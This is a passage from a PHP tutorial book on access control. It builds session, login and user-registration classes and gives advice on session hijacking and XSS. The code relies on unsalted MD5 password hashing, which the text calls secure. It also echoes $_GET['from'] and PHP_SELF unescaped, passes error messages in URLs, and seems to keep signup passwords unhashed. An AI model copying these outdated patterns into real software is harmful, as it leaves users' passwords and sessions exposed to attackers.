http://www.php.net/manual/en/language.oop5.magic.php.
280   The PHP Anthology

      Session Security
      Sessions are very useful, but there are some important security considerations you
      should take into account when you use sessions in your applications.

      By default, all a browser has to do to gain control of a session is pass a valid session
      ID to PHP. In an ideal world, you could store the IP address that registered the ses­
      sion, and double-check it against every new request that used the associated session
      ID. Unfortunately, some ISPs, such as AOL, assign their users a new IP on almost
      every page request, so this type of security mechanism would soon start to throw
      valid users out of the system. As such, it’s important to design your application in
      a manner that assumes that one of your users will eventually have his or her session
      “hijacked.”

      The user’s account is exposed until the session expires, so your aim should be to
      prevent the hijackers from causing serious damage while the session is active. This
      means, for example, that when a logged-in user goes to change his or her account
      password, the old password must be provided—obviously, hijackers won’t know
      that. Also, be careful with the way you handle the users’ personal information (such
      as credit card details). If you give users the opportunity to make significant changes
      to their account details, such as change a shipping addresses, be sure to send a
      summary notification of that change to them via email to alert users whose sessions
      may have been hijacked.

      Keep the session ID completely hidden, using SSL (secure sockets layer) to encrypt
      the conversation. What’s more, you should only use the cookie method of passing
      the session ID. If you pass it in the URL, you might give away the session ID upon
      referring the visitor to another site, thanks to the referer header in the HTTP request.

      The files PHP creates for the purpose of storing session information are, by default,
      stored in the temporary directory of the operating system under which PHP is run­
      ning. On Unix-based systems such as Linux, this directory will be /tmp. And, if
      you’re on a shared server, the session files from all the hosted sites will be stored
      together, which means that other users on the server can read the files’ contents.
      They might not be able to identify which virtual host and PHP script are the owners
      of the session but, depending on the information you place there, they might be
      able to guess.
Access Control      281

This possibility is a serious cause for concern on shared PHP systems; the most ef­
fective solution is to store your sessions in a database, rather than in the server’s
temporary directory. We’ll look more closely at custom session handlers later in
this chapter, but a partial solution is to set the session.save_path option in your
php.ini to a directory that’s not available to the public. You’ll need to contact your
hosting company in order to have the correct permissions set for that directory, so
that the nobody or wwwuser user with which PHP runs has access to read, write, and
delete files in that directory.

One final warning: with the help of a common web security exploit, cross-site
scripting, or XSS, it’s possible for an attacker to place JavaScript on your site that
will cause visitors to give away their session IDs to a remote web site, thereby allow­
ing their sessions to be hijacked. If you allow your visitors to post any HTML to
your site, make sure you check and validate it very carefully. Remember the golden
rules: never rely on client-side technologies (such as JavaScript) to handle security,
and never trust any content submitted from a browser.


How do I create a session class?
You can make a simple wrapper class to handle your sessions. Doing so ensures
that if you ever want to switch to an alternative session-handling mechanism, such
as one you’ve built yourself, you simply need to modify the class rather than rewrit­
ing a lot of code. We can provide an interface to the $_SESSION variable with a few
simple methods.

Solution
Our custom Session class begins with the constructor method that simply calls
session_start:

                                                              Session.class.php (excerpt)

 class Session
 {
   public function __construct()
   {
     session_start();
   }
282   The PHP Anthology

      We can then add the set and get methods to set a session variable and get a session
      variable, respectively:

                                                                 Session.class.php (excerpt)

           public function set($name, $value)
           {
             $_SESSION[$name] = $value;
           }

           public function get($name)
           {
             if (isset($_SESSION[$name]))
             {
               return $_SESSION[$name];
             }
             else
             {
               return false;
             }
           }



      Finally, we add a del method to delete a session variable, and the destroy method
      to remove all session variables and reset the session:

                                                                 Session.class.php (excerpt)

           public function del($name)
           {
             unset($_SESSION[$name]);
           }

           function destroy()
           {
             $_SESSION = array();
             session_destroy();
             session_regenerate_id();
           }
       }
Access Control       283


How do I create a class to control
access to a section of the site?
Now we reach the business end of access control—let’s look at a class that controls
who’s permitted access to those private sections of your site. This class uses a
database to hold the access credentials and works with an HTML login form.

Solution
The Auth class wraps login, session storage, and logout functionality in a simple,
easy-to-use PHP class.

The Auth Class
The Auth class uses the following configuration settings:

                                                            access_control.ini (excerpt)

 ; Access Control Settings

 ;web form variables e.g. $_POST['login']
 [login_vars]
 login=login
 password=password
 hash=login_hash

 ;user login table details
 [users_table]
 table=user
 col_login=login
 col_password=password



The first two settings reflect the names of the username and password fields that
will appear on the login form we’ll build in a moment. They’ll match the names of
the $_POST variables submitted by the form: $_POST['password'], for example. The
next three settings provide details of the table in which user information is
stored—the name of the table, and the names of the username and password columns
in the table.
284   The PHP Anthology

      The database table user will be used in all the solutions in this section. Here’s the
      SQL for the table:

                                                                  access_control.sql (excerpt)

       CREATE TABLE user (
         user_id     INT(11)      NOT NULL AUTO_INCREMENT,
         login       VARCHAR(50) NOT NULL DEFAULT '',
         password    VARCHAR(50) NOT NULL DEFAULT '',
         email       VARCHAR(50) DEFAULT NULL,
         firstName   VARCHAR(50) DEFAULT NULL,
         lastName    VARCHAR(50) DEFAULT NULL,
         signature   TEXT         NOT NULL,
         PRIMARY KEY (user_id),
         UNIQUE KEY user_login (login)
       );



      The Auth class body begins with the class properties:

                                                                     Auth.class.php (excerpt)

       class Auth
       {
         protected   $db;
         protected   $cfg;
         protected   $session;
         protected   $redirect;
         protected   $hashKey;



      The $db property will store an instance of our DB connection class, while the $cfg
      property will store the configuration settings. The $session property will store an
      instance of the Session class we created in “How do I create a session class?”. The
      $redirect property will store a URL to which visitors will be redirected if they
      aren’t logged in, or if their usernames or passwords are incorrect; this might be a
      login form, for example. The $hashKey property is a seed we provide to double-
      check the usernames and passwords of users who are already logged in. I’ll explain
      this in more detail later.

      Now we can create the constructor method of our Auth class:
Access Control      285

                                                               Auth.class.php (excerpt)

   function __construct(PDO $db, $redirect, $hashKey)
   {
     $this->db       = $db;
     $this->cfg      = parse_ini_file('access_control.ini', TRUE);
     $this->redirect = $redirect;
     $this->hashKey = $hashKey;
     $this->session = new Session();
     $this->login();
   }



The constructor requires a $db parameter that accepts an instance of the PDO class
(although you can alter it to a custom class—just be sure to adjust the database in­
teraction areas as required for your class). The $redirect parameter is a URL string
and the $hashKey parameter is a string.

In the constructor, we set the Auth instance variables, load the configuration file,
and create a new instance of the Session class, which we store in the $session
property; finally, we call the login method to validate the user against the database.

The login method checks the user’s login credentials:

                                                               Auth.class.php (excerpt)

   private function login()
   {
     $var_login = $this->cfg['login_vars']['login'];
     $var_pass = $this->cfg['login_vars']['password'];
     $user_table = $this->cfg['users_table']['table'];
     $user_login = $this->cfg['users_table']['col_login'];
     $user_pass = $this->cfg['users_table']['col_password'];

      if ($this->session->get('login_hash'))
      {
        $this->confirmAuth();
        return;
      }
      if (!isset($_POST[$var_login]) ||
          !isset($_POST[$var_pass]))
      {
        $this->redirect();
      }
286   The PHP Anthology

      The configuration settings are assigned to local variables for the sake of readability.
      The login method first checks to see whether values for the username and password
      are currently stored in the session; if they are, it calls the confirmAuth method. If
      username and password values are not stored in the session, the method checks to
      see whether they’re available in the $_POST array; if they’re not, the method calls
      the redirect method.

      Assuming the script has found the $_POST values, it calls the md5 function to get a
      digest for the password:

                                                                             Auth.class.php (excerpt)

         $password = md5($_POST[$var_pass]);



      We use the MD5 algorithm to store the password for security reasons, either in the
      session or on the database—we don’t want to leave plain-text passwords lying
      around.


             The MD5 Algorithm
            MD5 is a simple message digest algorithm (often referred to as one-way encryption)
            that translates any string (such as a password) into a short series of ASCII characters
            called an MD5 digest. A particular string will always produce the same digest,
            but it’s practically impossible to guess a string that will produce a given digest.
            By storing only the MD5 digest of your users’ passwords in the database, you can
            verify their login credentials without actually storing the passwords on your
            server! The built-in PHP function md5 lets you calculate the MD5 digest of any
            string in PHP.


      The script then performs a query against the database to see if it can find a record
      to match the submitted username and password:

                                                                             Auth.class.php (excerpt)

            try
            {
              $sql = "SELECT COUNT(*) AS num_users " .
                  "FROM " . $user_table . " WHERE " .
                  $user_login . "=:login AND " .
                  $user_pass . "=:pass";
Access Control     287



       $stmt = $this->db->prepare($sql);

       $stmt->bindParam(':login', $_POST[$var_login]);

       $stmt->bindParam(':pass', $password);

       $stmt->execute();

       $row = $stmt->fetch(PDO::FETCH_ASSOC);

     }

     catch (PDOException $e)

     {

       error_log('Error in '.$e->getFile().

           ' Line: '.$e->getLine().

           ' Error: '.$e->getMessage()

       );

       $this->redirect();

     }

     if ($row['num_users'] != 1)

     { 

       $this->redirect();

     }

     else

     {

       $this->storeAuth($_POST[$var_login], $password);

     }

   }




We use the PDO methods prepare and execute to perform the database query,
binding our $_POST[USER_LOGIN_VAR] and $password variables to the SQL paramet­
ers :login and :pass respectively. We can’t authenticate the user reliably if a
PDOException is thrown, so in that case, we log the error and call the redirect
method.

After we fetch the result of the query, we test that there is exactly one matching re­
cord. If not, we call the redirect method. Finally, assuming it has reached this
point, the script registers the username and password as session variables by way
of the storeAuth method (explained below), which makes them available for future
page requests.
288   The PHP Anthology


             login and Magic Quotes
           One point to note about the login method is that it assumes magic_quotes_gpc
           is switched off. In the scripts that utilize this class, we’ll need to nullify the effect
           of magic quotes. You can read more about this task in the section called “Checking
           for Magic Quotes” in Chapter 1.


      The storeAuth method is used to add the username and password digest to the
      session, along with a special hash value:

                                                                              Auth.class.php (excerpt)

         public function storeAuth($login, $password)
         {
           $this->session->set($this->cfg['login_vars']['login'], $login);
           $this->session->set($this->cfg['login_vars']['password'],
               $password);
           $hashKey = md5($this->hashKey . $login . $password);
           $this->session->set($this->cfg['login_vars']['hash'], $hashKey);
         }



      This special hash value is comprised of a seed value—the $hashKey parameter re­
      quired by the constructor—as well as the username and password values. As we’ll
      see in the confirmAuth method below, instead of laboriously checking the database
      to verify the login credentials whenever a user requests a page, the class simply
      checks that the current username and password produce a hash value that’s the
      same as that stored in the session. This approach prevents potential attackers from
      attempting to change the stored username after login if your PHP configuration has
      register_globals enabled.

      The confirmAuth method is used to double-check credentials stored in the session
      once a user is logged in:

                                                                              Auth.class.php (excerpt)

         private function confirmAuth()
         {
           $login = $this->session->get(
               $this->cfg['login_vars']['login']);
           $password = $this->session->get(
Access Control      289


         $this->cfg['login_vars']['password']);

     $hashKey = $this->session->get(

         $this->cfg['login_vars']['hash']);

     if (md5($this->hashKey . $login . $password) != $hashKey)

     {

       $this->logout(true);

     }

   }




Notice how we reproduce the hash built by the storeAuth method—if this fails to
match the original hash value, the user is immediately logged out.

The logout method is used to remove the login credentials from the session, destroy
the session, and return the user to the page URL stored in the $redirect property:

                                                              Auth.class.php (excerpt)

   public function logout($from = false)
   {
     $this->session->del($this->cfg['login_vars']['login']);
     $this->session->del($this->cfg['login_vars']['password']);
     $this->session->del($this->cfg['login_vars']['hash']);
     $this->session->destroy();
     $this->redirect($from);
   }



For security reasons, I choose to destroy the session here and start a completely
new one. However, you may want to consider whether or not you wish to destroy
the session. When the session is destroyed, not only are the Auth credentials re­
moved, but all session data is as well, and a new session ID is created. If you have
session data that you don’t want to lose upon logout, you may wish to remove or
comment out the session->destroy method call.

The final piece of our Auth class is the redirect method:

                                                              Auth.class.php (excerpt)

   private function redirect($from = true)
   {
     if ($from)
     {
290   The PHP Anthology


             header('Location: ' . $this->redirect . '?from=' .

                 $_SERVER['REQUEST_URI']);

           }

           else

           {

             header('Location: ' . $this->redirect);

           }

           exit();

         }

       }




      The redirect method is used to return the visitor to the login form (or whichever
      URL we specified upon instantiating the Auth class). By default, this method will
      send the original page URL, requested in the from variable, in the query string to
      the URL to which the browser is redirected—most likely the login form. This allows
      the login form to read the query string and return the users to the location from
      which they came; it saves the users from having to navigate back to that point, which
      feature might be useful if, for example, a session times out. Note that I specified in
      the logout method that redirect should not provide the from variable. If it did,
      the script might return users to the URL they used to log out, trapping them in a
      loop from which they can’t log in.

      One important point to note here is that the redirection URL argument passed to
      the constructor function should be absolute, not relative. According to the HTTP
      specification, an absolute URL must be provided when a Location header is used.
      Later on, when we put this class into action, I’ll break that rule and use a relative
      URL, because I can’t guess the script’s location on your server. This trick works
      because most recent browsers understand the relative location anyway (even though
      they shouldn’t, as this doesn’t honour the specification). On a live site, though,
      make sure you provide a full, absolute URL.

      Finally, and most importantly, we use the exit function to terminate all further
      processing. Calling the exit function prevents the calling script from sending the
      protected content that follows the authentication code. Although we’ve sent a
      header that should redirect the browser, we can’t rely on the browser to do what
      it’s told. If the request were sent by, for instance, a Perl script pretending to be a
      web browser, whoever was using the script would, no doubt, have total control over
Access Control      291

its behavior and could quite easily ignore the instruction to redirect elsewhere.
Hence, the exit statement is crucial.

The Restricted Area
Now that you’ve seen the internals of the Auth class, let’s take a look at some code
that makes use of it.

Here’s an example of a page we want to protect. First, we list the files we require:

                                                                   access.php (excerpt)

 <?php
 require_once    'strip_quotes.php';
 require_once    'Session.class.php';
 require_once    'Auth.class.php';
 require_once    'dbcred.php';



strip_quotes.php is a general-purpose script that checks for magic_quotes_gpc =
On and strips them from incoming requests, if necessary. classes/Session.class.php is
the Session class required by our Auth class and classes/Auth.class.php is the Auth
class itself. dbcred.php contains our database login credentials for use with PDO. The
file contains credentials relevant to our testing environment, so you’ll need to change
them should you wish to try this on your own web server.

Next, we instantiate the PDO object and authenticate the user. This code needs to
go at the top of any page we wish to protect from unauthorized access:

                                                                   access.php (excerpt)

 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);
 }
 catch (PDOException $e)
 {
   error_log('Error in '.$e->getFile().
       ' Line: '.$e->getLine().
       ' Error: '.$e->getMessage()
   );
292   The PHP Anthology


         header('Location: error.php?err=Database Error&msg=' .

             $e->getMessage());

         exit();

       }


       $auth = new Auth($dbh, 'login.php', 'secret');


       if (isset($_GET['action']) && $_GET['action'] == 'logout')

       {

         $auth->logout();

       }

       ?>




      First, we attempt to create a PDO instance to connect to our database. If an exception
      is thrown and we can’t connect, we don’t want to reveal our protected content. In­
      stead, we simply log the error, and redirect the user to an error page that displays
      some helpful information. Once we have a PDO instance, we can create a new Auth
      instance to check the current user’s login credentials. We pass our PDO instance, the
      URL of our login form—login.php, and the seed for the login details hashing func­
      tionality to the constructor function. Following that, we use an if statement to
      check for a logout request. If a $GET['action'] variable is present and it equals the
      value logout, we know the logout link has been clicked and we should log the user
      out by way of the Auth->logout method. All we have to do to make a logout link
      is append ?action=logout to any URL on our site.

      Finally, here’s the HTML of our restricted page, complete with a logout link:

                                                                        access.php (excerpt)

       <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
         <head>
         ⋮ HTML head contents…
         </head>
         <body>
           ⋮ restricted content…
           <p><a href="<?php echo $_SERVER['PHP_SELF']; ?>?action=logout">
               Logout</a></p>
         </body>
       </html>
Access Control     293

The only way the user can view this page is to provide a correct username and
password. The Auth class performs the security check as soon as it’s instantiated.
If valid username and password values have been submitted via a form, they’re
stored by the Auth class in a session variable, which allows the visitor to continue
using the sites various sections without having to log in again.

Creating the login form itself isn’t complex, but it’s made even easier with the
PEAR::HTML_QuickForm package. HTML_Quickform allows us to add fields to our
form and define the validation requirements easily. I won’t launch into an explana­
tion of how this works, but if you’d like to learn more about HTML_Quickform, you
can read the documentation online.7


          PEAR PHP 5 E_STRICT Compliance
         It should be noted that most PEAR packages are not PHP 5 E_STRICT compliant.
         You can expect errors to be generated, but don’t forget that you can turn them off
         with the error_reporting function. Submit a bug report to the PEAR bug system
         for any errors you do come across to help stomp them out in future versions.8


Let’s begin the login form: we’ll start by setting the error reporting level and requiring
the PEAR::HTML_QuickForm package:

                                                                           login.php (excerpt)

    <?php
    error_reporting(E_ALL);
    require_once 'HTML/QuickForm.php';



We set the error reporting level to E_ALL with the error_reporting function since
we’re using PEAR packages, which will cause E_Strict errors under PHP 5.

Next we check for the presence of a $_GET['from'] variable:




7
    http://pear.php.net/manual/en/package.html.html-quickform.php
8
    http://pear.php.net/bugs/
294   The PHP Anthology

                                                                       login.php (excerpt)

       if (isset($_GET['from']))
       {
         $target = $_GET['from'];
       }
       else
       {
         $target = 'access.php';
       }
       ?>



      The $_GET['from'] variable will have been set by our Auth class if it’s required.
      This variable will represent the page to which the user was trying to gain access,
      and from which they’ve been redirected to this login form. It’s used as the form’s
      action attribute to send the user back to that page once he or she is logged in.
      Otherwise, for the purposes of this demonstration, the form defaults to access.php,
      our demonstration-restricted content page.

      The next step is to construct our form with the PEAR::HTML_QuickForm class:

                                                                       login.php (excerpt)

       $form = new HTML_QuickForm('loginForm', 'POST', $target);

       // Add a header to the form
       $form->addElement('header', 'MyHeader', 'Please Login');

       // Add a field for the login name
       $form->addElement('text', 'login', 'Username');
       $form->addRule('login', 'Enter your login', 'required', false,
           'client');

       // Add a field for the password
       $form->addElement('password', 'password', 'Password');
       $form->addRule('password', 'Enter your password', 'required',
           false, 'client');

       // Add a submit button
       $form->addElement('submit', 'submit', ' Login ');

       ?>
Access Control      295

Finally, we have the HTML for the login form page:

                                                                    login.php (excerpt)

 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   ⋮ HTML head contents…
   </head>
   <body>
     <h1>Please log in</h1>
     <?php echo $form->toHTML(); ?>
   </body>
 </html>



The finished login form can be see in Figure 10.2.




                             Figure 10.2. The finished login form


Discussion
Access control consists of two main parts, or stages:

Authentication
   Authentication is the process by which you determine that users are who they
   say they are. Our Auth class handles this determination for us in the login
   method, when we confirm the username and password against the database.
296   The PHP Anthology

          We make the assumption that only the correct user will have these two pieces
          of information.

      Authorization
         Authorization is the process by which you determine which permissions must
         be given to an authenticated user. The Auth class is very limited in this respect,
         as no levels of access are defined—there’s only global access or no access to the
         site. Of course, you may want to grant a level of access that lies somewhere
         between these extremes, in which case you should see “How to do I build a
         permissions system?”

      You may wonder why we handle the users in this class using a database, rather
      then something similar to the HTTP authentication explained earlier. There are a
      couple of reasons, actually. First, as a site grows from only a few members to hun­
      dreds, thousands, or millions (we hope) of members, HTTP authentication becomes
      harder to handle and slower. Yes, we can add the member details to the user file,
      but as this, in turn, grows larger, it takes longer for the server to read and find a
      given user. Second, what if we want to store more information about the user—as,
      of course, most of us do—than just the username and password? Where would we
      keep that information? Well, we’d keep it in the database, of course. Doesn’t that
      mean we’re storing user information in two places? Yes, that’s right and, as you
      know, that’s something we’d want to avoid; it just makes the job harder for us if we
      ever have to go back and change things later.

      Room for Improvement
      The basic mechanics of the Auth class are solid, but it lacks the more sophisticated
      elements that will be necessary to halt the efforts of any serious intruders.

      It’s a good idea to implement a mechanism that can keep an eye on the number of
      failed login attempts made from a single client. If your application always responds
      immediately to any login attempt, it will be possible for a potential intruder to make
      large numbers of requests—with different username and password combinations—in
      a very short time, possibly using automated software to do so. The solution is to
      build a mechanism that counts the number of failed attempts using a session variable.
      Every time the number of failures is divisible by three (such as when three incorrect
      passwords are entered), use PHP’s sleep function to delay the next attempt by, for
      example, ten seconds. You may also decide that, after a certain threshold value (15
      failed attempts, for example), you block all further access from that IP address for
Access Control      297

a given period, such as one hour. Of course, changing an IP address is easy for a
determined intruder, but you’ll stall would-be intruders, at least, and perhaps make
their lives difficult enough to persuade them to pursue their nefarious activities
elsewhere.


How do I build a registration system?
Having an authentication system is fine, but how will you fill it with users in the
first place? If only yourself and a few friends will access your site, you can probably
create accounts for all users through your database administration interface. However,
for a site that’s intended to become a flourishing community to which anyone and
everyone is free to sign up, you’ll likely need to automate this process. You’ll want
to allow visitors to register themselves, but you’ll probably conduct some level of
“screening” so that you have at least a little information about the people who have
signed up, such as a way to confirm their identities. A common and effective
screening approach is to have the registrants confirm their email address.

The purpose of the screening mechanism is to give you the ability to make it difficult
for those users who have “broken the rules” in some way and lost their account
privileges to create new accounts. You have their email addresses, or at least one
of their email addresses—if they try to register again with that address, you can
deny them access. Be warned, though: a new type of Internet service is becoming
popular. Pioneered by Mailinator, these services provide users with temporary email
addresses that they can use for registrations. This, of course, means email is not a
fool-proof screening mechanism, but it is still a worthwhile addition to a registration
system.

Solution
Here, we’ll put together a registration system that validates new registrants using
their email addresses, and in turn, sends them an email that asks them to confirm
their registration via a URL.

A registration system is yet another great opportunity to build more classes! This
time, though, it will be even more interesting, as we use the PEAR::HTML_QuickForm9
package and PEAR::Mail_Mime10 to do some of the work for the registration system.

9
    http://pear.php.net/package/HTML_QuickForm/
10
     http://pear.php.net/package/Mail_Mime/
298   The PHP Anthology

      The rest will be handled by classes we’ll build, but the end result will be easy for
      you to customize and reuse in your own applications.

      First of all, we need to understand the process of signing up a new user:

      ■	 The user fills in the registration form.

      ■	 Upon the user’s completion of the form, the registration system inserts a record
         into the signup table and sends a confirmation email.

      ■	 The visitor follows the link in the email and confirms the account.

      ■	 We copy the details from the signup table to the user table. The account is now
         active.

      We use two tables for handling signups: this way, we can separate the “dangerous”
      or unverified user data from the “safe” or confirmed user data. You’ll need a cron
      job or similar scheduled task to check the signup table on a regular basis and delete
      any entries that are older than, say, 24 hours. Our separation of the tables makes it
      easier to purge the contents of the signup table (and avoid unfortunate errors), and
      keep the user table trim so that there’s no unnecessary impact on performance
      during user authentication.

      Our solution uses a specific database structure. Here’s the SQL for the signup table:

                                                                 access_control.sql (excerpt)

       CREATE TABLE signup (
         signup_id    INT(11)     NOT NULL AUTO_INCREMENT,
         login        VARCHAR(50) NOT NULL DEFAULT '',
         password     VARCHAR(50) NOT NULL DEFAULT '',
         email        VARCHAR(50) DEFAULT NULL,
         firstName    VARCHAR(50) DEFAULT NULL,
         lastName     VARCHAR(50) DEFAULT NULL,
         signature    TEXT        NOT NULL,
         confirm_code VARCHAR(40) NOT NULL DEFAULT '',
         created      INT(11)     NOT NULL DEFAULT '0',
         PRIMARY KEY (signup_id),
         UNIQUE KEY confirm_code (confirm_code),
         UNIQUE KEY user_login (login),
         UNIQUE KEY email (email)
       );
Access Control       299

Here’s the SQL for the user table:

                                                              access_control.sql (excerpt)

 CREATE TABLE user (
   user_id     INT(11)      NOT NULL AUTO_INCREMENT,
   login       VARCHAR(50) NOT NULL DEFAULT '',
   password    VARCHAR(50) NOT NULL DEFAULT '',
   email       VARCHAR(50) DEFAULT NULL,
   firstName   VARCHAR(50) DEFAULT NULL,
   lastName    VARCHAR(50) DEFAULT NULL,
   signature   TEXT         NOT NULL,
   PRIMARY KEY (user_id),
   UNIQUE KEY user_login (login)
 );



The SignUp Class
The first part of our solution is the SignUp class, which provides all the functionality
for signing up new users, and uses the following configuration settings:

                                                              access_control.ini (excerpt)

 ; Access Control Settings

 ;user login table details
 [users_table]
 table=user
 col_id=user_id
 col_login=login
 col_password=password
 col_email=email
 col_name_first=firstName
 col_name_last=lastName
 col_signature=signature

 ;signup login table details
 [signup_table]
 table=signup
 col_id=signup_id
 col_login=login
 col_password=password
 col_email=email
 col_name_first=firstName
300   The PHP Anthology


       col_name_last=lastName

       col_signature=signature

       col_code=confirm_code

       col_created=created




      The first group of settings represent the details of the user table in our database—the
      name of the database and its columns. The second group represent the database and
      column names of the signup table.

      Let’s define some custom exception classes so that we can provide a consistent level
      of error handling:

                                                                    Signup.class.php (excerpt)

       class SignUpException extends Exception
       {
         public function __construct($message = null, $code = 0)
         {
           parent::__construct($message, $code);
           error_log('Error in '.$this->getFile().
             ' Line: '.$this->getLine().
             ' Error: '.$this->getMessage()
           );
         }
       }
       class SignUpDatabaseException extends SignUpException {}
       class SignUpNotUniqueException extends SignUpException {}
       class SignUpEmailException extends SignUpException {}
       class SignUpConfirmationException extends SignUpException {}



      Our base class, SignUpException, is a custom exception that ensures the exception
      details are logged using the error_log function. The subclasses represent different
      exception situations that might arise during the signup process. This method of error
      handling implementation ensures that all exceptions are logged consistently, and
      allows any script that uses our SignUp class to implement custom logic to handle
      the various types of exceptions. We’ll see how such logic can be implemented in
      our script very soon.

      We begin our SignUp class definition with the class properties:
Access Control      301

                                                            Signup.class.php (excerpt)

 class SignUp
 {
   protected $db;
   protected $cfg;
   protected $from;
   protected $to;
   protected $subject;
   protected $message;
   protected $html;
   protected $listener;
   protected $confirmCode;



$db will contain a PDO instance for our database connection, $cfg will store our
configuration details, $from will contain the name and address used in the confirm­
ation email’s From field, $to will contain the name and address the email is sent
to, $subject will contain the subject of the email, $message will represent the body
of the email, and $html will contain a true or false value to indicate whether or
not the email is an HTML email. The $listener property will contain the URL listed
as the email confirmation link and $confirmCode will contain the unique code
needed to confirm this particular user’s registration.

The $to and $confirmCode properties are set and used internally by the class, while
the rest of the properties are initialized by the class constructor:

                                                            Signup.class.php (excerpt)

   public function __construct(PDO $db, $listener, $frmName,
                   $frmAddress, $subj, $msg, $html)
   {
     $this->db             = $db;
     $this->cfg            = parse_ini_file('access_control.ini',
         TRUE);
     $this->listener       = $listener;
     $this->from[$frmName] = $frmAddress;
     $this->subject        = $subj;
     $this->message        = $msg;
     $this->html           = $html;
   }
302   The PHP Anthology

      When we instantiate the object in the constructor above, we need to pass it a PDO
      object instance containing the connection to the database, the URL to which regis­
      trants should be directed when they confirm their signups, a Sender name and From
      address for use in the signup email (for example Your Name <you@yoursite.com>),
      and the subject and message for the email itself. Finally, we need to identify
      whether or not this is an HTML email, so that PEAR::Mail_Mime can format the
      message correctly.

      Whether it contains HTML or not, the message should contain at least one special
      tag: <confirm_url/>. This acts as a placeholder in the message, identifying the
      location in the email body at which the confirmation URL, built by the SignUp class,
      should be inserted.

      The createCode method is called internally within the class, and is used to generate
      the confirmation code that will be sent via email:

                                                                  Signup.class.php (excerpt)

         private function createCode($login)
         {
           srand((double)microtime() * 1000000);
           $this->confirmCode = md5($login . time() . rand(1, 1000000));
         }



      When the registration form is submitted, the createSignup method creates a record
      of the registration request. The createSignup method takes the information the user
      submits via the registration form, checks the database to ensure that the username
      and email address do not already exist in the user table, and inserts a new record
      into the signup table. Let’s take a look at how this method works:

                                                                  Signup.class.php (excerpt)

         public function createSignup($userDetails)
         {
           $user_table = $this->cfg['users_table']['table'];
           $user_login = $this->cfg['users_table']['col_login'];
           $user_pass = $this->cfg['users_table']['col_password'];
           $user_email = $this->cfg['users_table']['col_email'];
           $user_first = $this->cfg['users_table']['col_name_first'];
           $user_last = $this->cfg['users_table']['col_name_last'];
Access Control     303


      $user_sig = $this->cfg['users_table']['col_signature'];


      $sign_table = $this->cfg['signup_table']['table'];

      $sign_login = $this->cfg['signup_table']['col_login'];

      $sign_pass = $this->cfg['signup_table']['col_password'];

      $sign_email = $this->cfg['signup_table']['col_email'];

      $sign_first = $this->cfg['signup_table']['col_name_first'];

      $sign_last = $this->cfg['signup_table']['col_name_last'];

      $sign_sig = $this->cfg['signup_table']['col_signature'];

      $sign_code = $this->cfg['signup_table']['col_code'];

      $sign_created = $this->cfg['signup_table']['col_created'];


      try

      {

        $sql = "SELECT COUNT(*) AS num_row FROM " . $user_table . "

            WHERE

            " . $user_login . "=:login OR

            " . $user_email . "=:email";

        $stmt = $this->db->prepare($sql);

        $stmt->bindParam(':login', $userDetails[$user_login]);

        $stmt->bindParam(':email', $userDetails[$user_email]);

        $stmt->execute();

        $result = $stmt->fetch(PDO::FETCH_ASSOC);

      }

      catch (PDOException $e)

      {

        throw new SignUpDatabaseException('Database error when' .

            ' checking user is unique: '.$e->getMessage());

      }




First, we assign all the needed configuration settings to local variables to improve
the readability of our script. The first action the method performs is to complete a
database query: it counts the number of rows in the user table where the submitted
username matches the value in the login column in the database, or where the
submitted email address is a match to the value in the email column. We wrap this
action within a try {…} catch (PDOException $e) {…} block in case a
PDOException is thrown. When we catch the PDOException, we throw one of the
custom exceptions we wrote for this class—a SignUpDatabaseException.

The next step for the createSignup method is to check the results of the query and,
if it’s okay to proceed, to prepare the data for insertion into the signup table:
304   The PHP Anthology

                                                                  Signup.class.php (excerpt)

            if ($result['num_row'] > 0)
            {
              throw new SignUpNotUniqueException(
                  'username and email address not unique');
            }

            $this->createCode($userDetails[$user_login]);
            $toName = $userDetails[$user_first] . ' ' .
                $userDetails[$user_last];
            $this->to[$toName] = $userDetails[$user_email];



      If, on the other hand, the result is not 0, it indicates that we already have a user
      with that username or email address, and it’s not okay to proceed with the signup.
      Our reaction is to throw another one of our custom exceptions, this time a
      SignUpNotUniqueException, to indicate that the signup details are not unique.

      The final step in the createSignup method is to insert the new registration into the
      signup table:

                                                                  Signup.class.php (excerpt)

            try
            {
              $sql = "INSERT INTO " . $sign_table .
                  "(". $sign_login . ", " . $sign_pass .
                  ", " . $sign_email . ", " . $sign_first .
                  ", " . $sign_last . ", " . $sign_sig .
                  ", " . $sign_code . ", " . $sign_created . ") ".
                  "VALUES (:login, :password,
                  :email, :firstname, :lastname,
                  :signature, :confirm, :time)";
              $stmt = $this->db->prepare($sql);
              $stmt->bindParam(':login', $userDetails[$user_login]);
              $stmt->bindParam(':password', $userDetails[$user_pass]);
              $stmt->bindParam(':email', $userDetails[$user_email]);
              $stmt->bindParam(':firstname', $userDetails[$user_first]);
              $stmt->bindParam(':lastname', $userDetails[$user_last]);
              $stmt->bindParam(':signature', $userDetails[$user_sig]);
              $stmt->bindParam(':confirm', $this->confirmCode);
              $stmt->bindParam(':time', time());
              $stmt->execute();
Access Control      305


     }

     catch (PDOException $e)

     {

       throw new SignUpDatabaseException('Database error when' .

           ' inserting into signup: '.$e->getMessage());

     }

   }




All the data in the $userDetails variable—the details submitted via the registration
form—are inserted into the signup table. If a PDOException is thrown, we throw a
new instance of our SignUpDatabaseException class.

The sendConfirmation method is used to send a confirmation email to the person
who’s just signed up:

                                                            Signup.class.php (excerpt)

   public function sendConfirmation()
   {
     // Pear Mail_Mime included in the calling script
     $fromName = key($this->from);
     $hdrs = array(
         'From'     => $this->from[$fromName],
         'Subject' => $this->subject
     );
     $crlf = "n";

      if ($this->html)
      {
        $replace = '<a href="' . $this->listener . '?code=' .
            $this->confirmCode . '">' . $this->listener .
            '?code=' . $this->confirmCode . '</a>';
      }
      else
      {
        $replace = $this->listener . '?code=' . $this->confirmCode;
      }
      $this->message = str_replace('<confirm_url/>',
          $replace,
          $this->message
      );

